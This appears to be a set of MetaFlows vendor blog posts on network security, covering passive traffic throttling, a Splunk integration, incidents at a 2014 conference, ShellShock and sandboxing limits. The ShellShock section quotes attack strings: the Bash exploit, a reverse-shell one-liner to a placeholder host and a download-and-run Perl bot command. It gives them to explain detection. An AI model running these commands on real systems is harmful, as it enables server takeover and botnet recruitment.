Throttle in Passive Mode

Sometimes users can knowingly, or unknowingly, abuse a network by using a lot of bandwidth. With the proliferation of video on demand services such as Netflix, Hulu, and Amazon Prime, some institutions are once again finding themselves battling bandwidth issues.

Until now, one needed an in-line device, such as a firewall, to throttle traffic by allocating certain bandwidth to certain flows or applications. Any in-line device also adds latency and reduces reliability, especially on high speed links. Wouldn’t it be nice to throttle specific traffic in a way that does not impact performance of the traffic you do care about? This has been an age-old conundrum for network engineers.

Well, continuing on our hot streak of innovations, MetaFlows recently developed (in collaboration with one of our university customers) an unprecedented technique to throttle traffic in passive mode! It works a bit like active response, where spoofed packets are injected into the traffic stream to shut down flows. In this case, we are not shutting down flows, we are forcing them to slow down.

The result is that you can identify any TCP flow using one or more of our 20,000 signatures (appID is coming very soon) and limit its bandwidth. This means you can have zero impact on the performance and reliability of your production traffic while achieving very fine-grained control of the traffic you do not care about!

MetaFlows: SC Magazine Innovators Hall of Fame

Our friends at SC Magazine have inducted us into the SC Magazine Innovators Hall of Fame. It is nice to be recognized for our innovations. Importantly, this is purely based on their journalistic curiosity; we give them props for performing their reviews based on sound technical knowledge. We refuse to pay money for recognition. You might think we are old-fashioned but this is how we roll at MetaFlows.

Their article also points out the importance of monitoring beyond the network perimeter using multi-session correlation. If you are not sure what multi-session correlation can do for you, it is best to put it to the test. You will be amazed at what you can find out about your network.

Read the article at SC Magazine’s Website

Get Packet Payloads with Splunk

It is fairly easy to create a workflow action to access the MetaFlows File-Carving and PCAP extraction interface.

Step 1: Extract the flow information from the MetaFlows event feed.

If you already use CEF log output from MetaFlows, or if you want to change to it, then the required fields should already be extracted:
src, dst, spt, dpt, start

Or, if you are using the standard syslog output then you will need something similar to the following extraction regex to make sure each record has those fields:

Additionally, you will need to append “|eval start=_time” to your queries in order to get the start field unless you already have a derived field which gives you a unix timestamp to use in the query.

Or, if you have your own parsing in place that uses different field names which correspond to ‘Source IP, Destination IP, Source Port, Destination Port, Timestamp‘ then you may need to adjust the field names in the URI under step 2 to match. You will still need to make sure that you can provide a unix timestamp field.

Step 2: Create a workflow action.

Go to Settings -> Fields -> Workflow actions -> New and set the following fields:
Label: Extract PCAP / Carve Files $src$ $dst$ $start$
Show action in: Both
Action Type: Link
URI:$src$&dsta=$dst$&srcp=$spt$&dstp=$dpt$&st=$start$&sensor_sid=<your sensor’s SID>
Open link in: New Window
Link method: Get

Your sensor’s SID should be a hash listed on the view sensors page, or in the file /nsm/etc/UUID on the sensor itself.

Step 3: Test the Setup.

Test by selecting Extract PCAP / Carve Files from the Event Actions menu for any event in a search. You need to be logged into MetaFlows for this to work. It should take you straight to the File Carving interface which will provide a link to the PCAP data as well.

Note that if you have ‘Log All Packets‘ enabled, you will most likely see the PCAP slice as well as all the files that were downloaded/uploaded in that flow or set of flows. If you do not have ‘Log All Packets‘ enabled, you will only see the PCAP slice corresponding to the packets logged by the IDS system.

What We Caught at Supercomputing 2014

  1. Scanners (DNS, MYSQL, SSH, Shodan Indexing, portmap)
    DNS and MYSQL scanning from China, SSH brute force from everywhere, Shodan vulnerability indexing, and one very persistent portmap scanner.
  2. Lots of BitTorrent users kicked off the wireless network for illegal file sharing.
    In previous years torrent users have been mostly ignored since there were no good ways to determine which uses of the torrent software were legitimate and which were not. This year, however, these were not hard to find at all. MetaFlows software automatically decodes the torrent and magnet information to determine exactly which files a user is trying to download as well as which files they are seeding to other users. At first we were very picky about only disabling heavy abusers seeding outbound shares of recent movies and current TV shows. As the conference went on we got a bit more aggressive at reporting on and banning downloaders as well. When the user was not on the wireless, they were sometimes a little hard to pin down:

    “…it was from someone who gave a talk for them and plugged into their network. This person will not be presenting again, so they expect we will not see this activity again. Please let them know if we do.”

  3. Spyware on the show floor.
    We saw the return of some MarketScore spyware that we had seen at the Denver conference in 2013. Unfortunately we could not always track down adware/spyware cases on the show floor or the wireless since they were a lower priority.
    snort-policy-violation/malware:1.2001564:ET MALWARE Spyware Proxied Traffic
  4. Inbound telnet scanning and the default IPMI port
    A couple of cases of telnet port 23 being accessible by the outside world were discovered before they could be exploited. One of them appeared to be an IPMI port that someone had accidentally plugged in; it was still configured to the default admin/admin password.

    “We chatted with the two booths that have these machines. The one with the admin/admin account has disconnected that interface. The second booth has disabled telnet. Both booths were very happy that we let them know. Thanks!”

  5. Linux Trojans – default/weak passwords led to boxes being added to a DDoS botnet.
    snort-trojan-activity/trojan:1.2018808:ET TROJAN DoS.Linux/Elknot.G Checkin

    Unfortunately the first of these that we reported was left unresolved and its status as a bot was confirmed when it began sending SYN flood attacks overnight. The host did get attended to the next day, and future cases of this infection were taken much more seriously. Once we got the behavior pattern down we found that the infected host downloads a binary payload from a command and control server.

    After adding the binary source to the blackhole list these infections stopped. Generally the cases that remained were resolved by talking to the user and letting them take care of it:

    “The technical guy said that that IP was just a VM and he will shut it down. We are no longer seeing traffic.”

    “I chatted with the guy in booth WXYZ and he is in the process of cleaning up his Linux box. He was thankful for the information, and commented that he had the default username and password for root on the Linux box.”

  6. Suspicious signs of WireLurker on OS X systems.
    We want to research these a bit more; it looked like there were maybe three OS X machines on the network triggering alerts for this “evil” domain.

    snort-trojan-activity/trojan:1.2019667:ET TROJAN OSX/WireLurker DNS Query Domain

    This alert was sometimes also seen with weird DNS alerts:

    snort-policy-violation/dns:1.2014703:ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Reserved Bit Set - Likely Kazy
  7. Large scale SIP Scanning.
    There was a massive DDoS-style scan of the network on port 5060 on the second day of the conference, with hundreds of external scanners probing thousands of internal hosts, so it stood out to us right away. We suspect it may have contributed to some infrastructure issues, and we recommended temporarily blocking that inbound port at the border if no known legitimate services were running on it.

ShellShock Analysis

How ShellShock Works

ShellShock exploits a vulnerability in Bash. It allows unauthorized users to send commands to your Linux web servers. For example:

() { :;}; /bin/bash -c <command>


env X='() { (.+)=>\' bash -c "<filename> <command>"

<filename> and <command> can be anything. <command> will execute and the output will be in <filename>. .+ means one or more characters (like “a”, “b”, “cc”, “ddd”, “abcd”, etc.). The second form is a bit more tricky to use remotely, but I would not ignore the vulnerability.

Some examples of things that are being executed as we speak are:
wget 'https://<bad_server>/s.php?s=https://<your domain>/'
/bin/ping -c 1 <command_and_control>

These examples tell the hackers if a server is open to the exploit. However, remember: <command> can be anything. Attackers can remove files, modify your web site, copy any file from your web server, or execute database commands to steal all your secrets!

An example of a particularly bad <command> is:

/bin/bash -c 'bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1'

This gives attackers a shell to your web server. Anything they execute on <bad_ip> will be executed on your server. In one particular case, they installed a Perl bot with the following command:

wget -O /tmp/.lCE-unix https://<compromised_ip>/icons/xt.dat;perl /tmp/.lCE-unix <irc_channel>;rm -rf /tmp/.lCE-unix;uptime

This installs a Perl bot that takes commands from a command and control center and executes them on your server.

MetaFlows’ Response Highlights the Need for Multi-Session Analysis

We immediately deployed IDS rules published by our friends at SourceFire and Emerging Threats as soon as they came out. These rules detect the exploit itself but they will be triggered a lot because attackers are aggressively scanning web servers for vulnerabilities as we speak. This is where multi-session analysis comes into play. MetaFlows can tell you which servers being scanned are actually exploited! We have now published Correlation Engine Rules (a capability unique to the MetaFlows Security System) that not only tell you if there is an attempt to subvert your web servers, but also whether any of your servers were compromised.

MetaFlows Correlation Engine Rules work as follows:

  1. Detect an attempt to execute the ShellShock exploit on internal address A.
  2. Shortly thereafter, detect if there is a subsequent outbound flow (ICMP or TCP) from A to an external IP address.
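
The two steps above can be sketched as a small time-window join. This is only an illustration of the idea, not MetaFlows' Correlation Engine Rule syntax: the record shapes, the `INTERNAL` address range, the 60-second window, and the function name are all assumptions made for the example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Hypothetical record shapes; real IDS alerts and flow logs will differ.
@dataclass
class ExploitAttempt:
    ts: float      # unix time of the ShellShock IDS alert
    target: str    # internal address A

@dataclass
class Flow:
    ts: float      # unix time the flow started
    src: str
    dst: str
    proto: str     # "tcp", "icmp", ...

INTERNAL = ip_network("10.0.0.0/8")  # assumed internal address range

def likely_compromised(attempts, flows, window_s=60.0):
    """Return internal hosts that opened an outbound ICMP or TCP flow
    within window_s seconds after a ShellShock attempt against them."""
    hits = set()
    for a in attempts:
        for f in flows:
            outbound = (f.src == a.target
                        and ip_address(f.dst) not in INTERNAL)
            soon_after = 0 <= f.ts - a.ts <= window_s
            if outbound and soon_after and f.proto in ("tcp", "icmp"):
                hits.add(a.target)
    return hits
```

A scan alone produces an `ExploitAttempt` but no matching outbound flow, so only hosts that actually "called home" after the attempt are returned.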

If you are interested in deploying MetaFlows’ multi-session analysis with our Correlation Engine Rules, let us know and we will be glad to help you get started.

Cloud-Based Sandboxing

Cloud-based Sandboxing refers to the ability of network security devices such as firewalls to:

  1. Query a database to see if some content traversing the network exhibits a known signature.
  2. Upload unknown suspicious content to the sand-boxing cloud to see if it misbehaves.

The devil is in the details.

How frequently is the cloud updated?

Most vendors do not like to share; they all create their own repository of signatures. If you want evidence of how poorly this works, submit a bad piece of malware to Virus Total. You would be lucky to see more than 3 or 4 out of 54 vendors having a pre-existing signature. So, when a vendor tries to sell you their cloud-based sandbox for top dollar, ask yourself: “Do I really want to pay for 1/54 of what I could get if I signed up with a signature sharing service such as Virus Total?” I would not.

Is this really a Sandbox or more like an autopsy?



Some vendors will try to sell you a cloud-based sandbox for $1000s/year; but if you read the fine print, it will actually say that the processing time is 2 hours or more. This means that if you received an unknown email attachment, you would not know what to do with it for 2 hours or more. Some sand-boxing services are better and would give you an answer within minutes. So be careful what you sign up for.

How is MetaFlows Better?

For starters, we use Virus Total, so when checking for a content signature, you are using ALL Antivirus systems at once;

all 54 not 1.

Why would you rely on one vendor’s database?



Recently, we started our own cloud-based sand-boxing service. The rationale is that it complements the signature checking system when something is brand new and nobody in the world has seen it before (not even Virus Total!). A best-effort sand-boxing service comes standard with our appliances. Typically the sand-box can execute a sample in anywhere from 90 seconds to 10 minutes or so (not 2 hours!). Our customers do not pay for this, because we feed this information back into the community through Virus Total. If we find a new bad email attachment, we notify our customer and block it; but we also help the community by letting the rest of the world know about it (we like sharing).

A paid service guarantees execution within 120 seconds and an on-site, sand-boxing appliance can reduce the time even further to approximately 30-60 seconds. When you pay for these services, we let you decide if you want to share or not; we hope you will share; but it is up to you.

What’s Wrong with NG Firewalls?

Next generation (NG) firewalls allow administrators to efficiently restrict network use policies to prevent infections. These firewalls (Palo Alto Networks is the most notable example) secure your enterprise by blocking everything that is not explicitly allowed by your network administrator. They clamp down on anything unknown: unknown users, unknown applications, unknown ports, etc. NG firewalls also provide some traditional IPS features that can be used to shape traffic coming into the network.



So what is wrong with locking everything down as a primary defense mechanism? This approach has 2 major drawbacks.

Problem 1: It’s Not Scalable

NG firewalls are basically a heuristics-based approach to security. Some networks and some operators might be a good fit for this, but many are not. This approach works in small, simple networks where the operator is omnipotent and has complete visibility on the network use policies. Unfortunately, most networks are not simple and most operators are not omnipotent.

As new uses for networks evolve and new applications are used, these heuristics need to be constantly updated and evolved as well. After a few months of complaining from their users, operators will start relaxing the policies and therefore leave the network as exposed as it once was with a traditional firewall.


Problem 2: It Can’t Actually Stop Active Intrusions

Once something bad makes it inside the network, NG firewalls are no better than a traditional IDS system. They flood network operators with thousands of alerts which can be used as audit trails, but are otherwise useless for detecting active intrusions. This poses a significant risk: most data breaches today happen through legitimate network channels (browser drive-by, spear-phishing, social engineering, etc.). Think about your house: you can put bars on the windows, but if your teenager invites a thief inside the house, the bars and the locks are useless.



Don’t Put All Your Eggs In One Basket

There is a saying in security: “Hard on the outside and soft and chewy on the inside.” If you are serious about security, you need to lock the gate. But you also need a way to look for anomalies on the inside. That is what MetaFlows does well: we complement your firewall, traditional or next generation. We don’t claim to be able to replace everything in one magical box like most of our competitors, and you shouldn’t put all of your eggs in one basket. Your firewall should do what it does best: lock your door. But firewalls must also be complemented by a security solution that can actively detect and respond to network intrusions. 20 years of cyber-security research helped us to create a product that detects threats, no matter how they got in. Try MetaFlows today to see what your firewall is missing!

Connecting the Dots

One of the most important lessons from cyber-war fighters is that relying on a single mechanism to defend your enterprise is naive. In fact, the more disparate and heterogeneous the network defense mechanisms, the better. MetaFlows fully embraces this concept by providing several detection mechanisms that work together:

  • IDS behavioral analysis looking for multiple symptoms that indicate a compromised host.
  • Using up to 50 different antivirus solutions at once to find bad content on the network.
  • Honeypots continuously mining for new threats.
  • Flow and log analysis.

These are just a few things that MetaFlows does.

Until now, MetaFlows has used these mechanisms independently to find and defeat threats. Our multifunctional approach has proven to be very effective. Many customers characterize the MetaFlows Security System as “The Last Line of Defense”. But now, we just upped the ante!

Leveraging our multifunctional view, we now also support behavioral correlation to combine disparate intelligence sources. Our Correlation Engine Rule (CER) specification now allows you to connect the dots across the different functional paradigms. But enough smoke and mirrors! Here are some REAL examples.

Data Exfiltration

  1. Detect the external hosts that are scanning your network.
  2. If any of these hosts exchange more than a few thousand packets with an internal host, flag the internal host as compromised.

Notice that (1) is an IDS function while (2) is a flow analysis function.
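
As a rough sketch of how an IDS result (the scanner list) can be joined with flow records, consider the following. It is not the CER specification itself; the tuple layout, the function name, and the 5000-packet threshold standing in for "a few thousand packets" are assumptions chosen for illustration.

```python
from collections import Counter

def flag_exfiltration(scanner_ips, flow_records, packet_threshold=5000):
    """scanner_ips: set of external IPs the IDS flagged as scanning.
    flow_records: iterable of (external_ip, internal_ip, packets).
    Returns internal hosts that exchanged more than packet_threshold
    packets in total with any single known scanner."""
    totals = Counter()
    for ext, internal, packets in flow_records:
        if ext in scanner_ips:  # step 1: only flows involving scanners
            totals[(ext, internal)] += packets
    # step 2: heavy conversation with a scanner marks the internal host
    return {internal for (ext, internal), n in totals.items()
            if n > packet_threshold}
```

Heavy traffic with an external host that never scanned the network is deliberately ignored here; the signal comes from the combination of the two observations.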

Zero-day Infection of Something That Cannot Be Executed in a Sandbox

  1. Host A downloads a bad .exe from server B.
  2. Host C (an Apple computer) downloads a JAR file from server B.
  3. Host C is talking to a known Command & Control site.

(1) is detected by a virus scanning application, (2) is detected with L7 analysis, (3) is detected by an IDS rule.

These examples demonstrate why traditional defenses are inadequate. Correlated together, these rules give you a powerful view of exactly what is happening on your network. You really need a multifunctional system that can connect the dots.

What’s Wrong with Sandboxing?

How Sand-Boxing Works

The latest and hottest trend in cyber-security is sand-boxing. Sand-boxing is virus detection on steroids. Instead of relying on prior knowledge about particular viruses, this technique emulates a user’s workstation with a sandbox and tracks anything that attempts to go out of the box or attempts to infect other machines. The process is straightforward:

  1. Get all potentially infectious content coming into your organization, and
  2. Emulate each piece of content as if it was executing on your hosts.

Limitations of Sand-Boxing

Sand-boxing has low false positive rates, but causes a lot of false negatives. In other words, when it tells you that something is bad, it is almost certainly bad. But it has the potential to miss a lot of bad things.

Architectural Limitations

This limitation has to do with step 1 above (get all dangerous content coming into your organization). Your defense perimeter is dissolving because of new network trends and applications:

  1. Mobile devices continuously come into and go out from your network.
  2. Peer-to-peer protocols (which go right through sand-boxing and firewall appliances) are becoming mainstream (Skype, BitTorrent, B2B applications).
  3. Services are being pushed to the cloud, out of the grasp of your sandbox.
  4. Virtual machines move around at the speed of light from one host to another.
  5. IPv6 and other emerging trends are facilitating end-to-end encrypted tunneling right through your perimeter.

So, if you do not have a perimeter, how do you know what is coming in? Well, you don’t! That is why sand-boxing (or pure virus detection) is limited in scope and cannot survive the evolution of malware.

Another architectural limitation has to do with cost. If you run a large network, executing and/or opening every piece of content before it is delivered requires a lot of CPU and will slow down your network. Sand-boxing can only scale to a certain size; beyond that it becomes unrealistic and expensive.

Algorithmic Limitations

This limitation has to do with step 2 above (emulate each piece of content as if it was executing on your hosts). Evasion is an information security term that refers to the ability of the bad guys to:

  1. Know how you are detecting them and
  2. Add subterfuges to defeat your specific security measures.

A sandbox can be detected. Once malware realizes that it is in a sandbox, the malware will switch to its best behavior so that the sandbox is happy. Only when the malware gets out of the sandbox and on to the actual target device will it do its damage.

A second algorithmic limitation is that not every system is the same. Sandboxing a particular version of Microsoft Windows (which is what commercial sandbox solutions do) leaves all your other devices (Linux, Apple, Android, etc.) completely open to attack.

How is MetaFlows Better?

MetaFlows is not an antivirus. We detect the attempts to introduce a virus in your network AND/OR detect the presence of a virus. Think of it as a network-level sandbox that not only inspects individual pieces of content, but also keeps track of the behavior of all your devices over time. There is one thing a malicious host cannot evade: being malicious!

If it looks like a duck, swims like a duck, and quacks like a duck… it is a duck.

How does it work?

MetaFlows looks for classes of odd behavior from hosts on your network:

  1. Scanning behavior
  2. Being attacked on vulnerable ports
  3. Downloading dangerous content
  4. Communication with questionable sites or sites that are already known to be bad
  5. Scanning outward or doing a lot of DNS lookups

If we detect behavior from multiple event classes over a time period (ranging from minutes to hours), MetaFlows triggers an alert.
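
The idea of alerting on several event classes seen for one host within a time period can be sketched with a sliding window. This is a minimal illustration under assumed names: the `(ts, host, event_class)` tuple layout, the class labels, the two-class minimum, and the one-hour window are not taken from the MetaFlows product.

```python
from collections import defaultdict

def hosts_to_alert(events, min_classes=2, window_s=3600.0):
    """events: iterable of (ts, host, event_class) tuples.
    Returns hosts that showed at least min_classes distinct event
    classes within any window of window_s seconds."""
    by_host = defaultdict(list)
    for ts, host, cls in events:
        by_host[host].append((ts, cls))

    alerts = set()
    for host, evs in by_host.items():
        evs.sort()  # order each host's events by timestamp
        start = 0
        for end in range(len(evs)):
            # Advance the left edge until the window spans <= window_s.
            while evs[end][0] - evs[start][0] > window_s:
                start += 1
            classes = {cls for _, cls in evs[start:end + 1]}
            if len(classes) >= min_classes:
                alerts.add(host)
                break
    return alerts
```

A host that repeats a single class of behavior, or whose different behaviors are far apart in time, does not alert; only a cluster of distinct symptoms does.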

Here is a simple example:

  1. External host B performs a brute force attack to guess your password on port 22 on server A.
  2. One hour later there is a large transfer of data from server B to another server C (on your network).

Bang! That’s a hit for us. But a sandbox has no clue! By itself, a sandbox would not detect this behavior. The malware could “play nice” once it realizes that it is in a sandbox. The sandbox would then allow the malware to leave and get inside your network, where it could do substantial damage. But MetaFlows can keep an eye on software even after it leaves the sandbox.

The main advantage of a network level sand-box is that it does NOT solely rely on inspecting content (like an antivirus) but instead detects malware in the act of being bad. So, if someone walks in through your front gate with an infected laptop, as soon as that laptop misbehaves, it will be flagged down.


The best part is that MetaFlows works regardless of what devices are on your network – it solves the algorithmic limitations of sandboxes. Our behavioral event classes do not depend on the type of system: if an internal host is performing outbound scanning, we do not care if it is a Microsoft device or an Apple device. All we need to know is that it has engaged in malicious behavior.


Finally, our approach is much more scalable than a content sandbox. MetaFlows mitigates the architectural limitations of sandboxes by scaling to 10 Gbps links with standard off-the-shelf quad-CPU systems. The cost and power consumption are orders of magnitude lower.

Predictive Correlation — The Future of Cyber Security?

What is Predictive Correlation?

Research funded by the National Science Foundation has led to the development of a proprietary inter-domain correlation algorithm that is mathematically similar to Google’s Page Rank algorithm. Event scores are autonomously obtained from a global network of honeypot sensors monitored by the MetaFlows Security System (MSS). The honeypots are virtual machines that masquerade as victims. They open up dangerous ports/applications and/or browse dangerous websites. As the honeypots are repeatedly infected, the MSS records both successful and unsuccessful hacker URLs, files, bad ports, and bad services. When a honeypot has a security event that triggers a false positive, the alerts for those events are ranked negatively, thus providing insight into events that should be routinely ignored or turned off. Security events that trigger true positives are ranked positively, thus improving their visibility. This information is then propagated in real time to each of our subscribers’ sensors in the system to augment traditional correlation techniques. This additional inter-domain correlation is important because it adds operational awareness based on real-time intelligence.

How does it work?

As shown in the figure below, honeypots work behind the scenes, continuously mining global relevance data and flow intelligence (IP reputation) for threats that penetrate differing degrees of cyber-defenses on different types of systems. After this step, annotated data from all network sensors (whether the sensors are honeypots or not) are compared and events are correlated with an algorithm similar to Google’s Page Rank algorithm: X = bs + aW*X.

Diagram of MetaFlows event correlation system
Figure 1: Predictive Global Correlation

This process is designed to provide subscribers with intelligence data that takes into account the similarities and differences between the sources of the data. Because of space limitations we cannot explain the math and why it makes sense; however, our system builds on the work described in “Highly Predictive Blacklisting” by Jian Zhang, Phillip Porras, and Johannes Ullrich (SRI International and the SANS Institute), Usenix Security, August 2008 (we highly recommend that you read this article).
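
For readers who want a feel for the recurrence X = bs + aW*X, here is a minimal fixed-point iteration. The text does not define the symbols, so this sketch assumes X is a vector of scores, s a seed vector, W a weight matrix relating sources, and a and b scalar constants; those interpretations, the default values, and the function name are assumptions, not the proprietary algorithm. The iteration only converges when a times the spectral radius of W is below 1.

```python
def solve_ranking(W, s, a=0.5, b=1.0, iters=200, tol=1e-12):
    """Iterate X <- b*s + a*W*X until the largest change is below tol.

    W is a square matrix given as a list of rows; s is a list of the
    same length. Both are plain Python lists of floats."""
    n = len(s)
    x = [0.0] * n
    for _ in range(iters):
        new = [b * s[i] + a * sum(W[i][j] * x[j] for j in range(n))
               for i in range(n)]
        if max(abs(new[i] - x[i]) for i in range(n)) < tol:
            return new
        x = new
    return x
```

With two mutually linked sources, `W = [[0, 1], [1, 0]]` and `s = [1, 0]`, the seeded source ends up with the higher score and part of that score propagates to its neighbor.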

So What?

As a result of the algorithm, once a piece of intelligence reaches our system it is not equally distributed to all customers. Instead, it is mathematically weighted and routed to where it is most relevant, just as the first few web pages of a Google search yield the most relevant information for a particular search.

In addition to real-time intelligence on true positive security events (positive ranking), our system also provides information on security alerts that are irrelevant by demoting them and reducing false positive clutter. In other words, this system can propagate known false positives and known true positives among sensors using a mathematical model that maximizes prediction.

Graph of prediction power for MetaFlows ranking algorithm

The graph above quantifies the prediction power of the ranking algorithm. The experiment was carried out on the Snort event relevance data gathered between February 7th, 2010 and February 22nd, 2010. At the start of each day we performed the ranking operation over the previous day’s Snort event data and compared the predicted ranking values with the actual events gathered during that day from the sensors and honeypots. The simple prediction (blue line) is based on predicting that, for each sensor, the same event ranking is carried over from the previous day without running the algorithm (this is what people normally do today).

The Y axis is the hit ratio. The “hit ratio” is defined as the number of times the prediction matches the outcome in terms of the sign (positive or negative), divided by the number of non-zero rankings predicted.

  • We increment the hit counter if the prediction and the outcome have both positive rankings.
  • We increment the hit counter if the prediction and the outcome have both negative rankings.
  • We decrement the hit counter if the prediction and the outcome have opposite signs.
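
The counting rules above can be written out directly. In this sketch the dictionaries mapping an event identifier to a signed ranking are a hypothetical data layout, and treating an outcome of zero as neither a hit nor a miss is an assumption, since the text does not cover that case.

```python
def hit_ratio(predicted, actual):
    """predicted, actual: dicts mapping event id -> signed ranking.
    Returns the hit counter divided by the number of non-zero
    predicted rankings."""
    hits = 0
    nonzero = 0
    for event, p in predicted.items():
        if p == 0:
            continue            # zero predictions are not counted
        nonzero += 1
        o = actual.get(event, 0)
        if p * o > 0:           # same sign: both positive or both negative
            hits += 1
        elif p * o < 0:         # opposite signs
            hits -= 1
    return hits / nonzero if nonzero else 0.0
```

Because wrong-sign predictions subtract from the counter, the ratio can be negative for a predictor that is wrong more often than it is right.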

The figure shows that the ranking prediction (orange line) is strictly superior to simple prediction by 141% to 350% (depending on the day). This might not seem too impressive on the surface but if you dig a little deeper this is what it means:

  • Assuming 5 minutes of human analysis time per incident, a system with no ranking would give you a hit rate that finds 1 actionable item for every 20-30 incident investigations (or 0.4 incidents per analyst hour).
  • A system with predictive ranking would let you find 1 actionable item every 6-7 incident investigations (2 incidents per analyst hour).
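
The per-hour figures follow from simple arithmetic: at 5 minutes per investigation an analyst completes 12 investigations per hour, and the number of actionable items is that rate divided by the number of investigations needed per hit. The helper below is only a worked version of that calculation; its name and parameters are illustrative.

```python
def actionable_per_hour(investigations_per_hit, minutes_per_investigation=5):
    """Actionable items found per analyst hour."""
    investigations_per_hour = 60 / minutes_per_investigation
    return investigations_per_hour / investigations_per_hit

# No ranking: 1 hit per 20-30 investigations.
no_ranking = (actionable_per_hour(30), actionable_per_hour(20))
# Predictive ranking: 1 hit per 6-7 investigations.
with_ranking = (actionable_per_hour(7), actionable_per_hour(6))
```

The lower bound without ranking and the upper bound with ranking correspond to the 0.4 and 2 incidents per analyst hour quoted above.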

You can do the math in terms of cost savings: it’s huge! Most of the cost of network security systems is not the appliance or the software, but rather wasted analyst time!

You Should Not Just Take our Word for it!

The cyber-security arena is packed with technologies that claim they have the best solutions. That is why we encourage users to take the time to evaluate our predictive correlation and run it side-by-side with existing solutions. The outcome is always surprisingly good.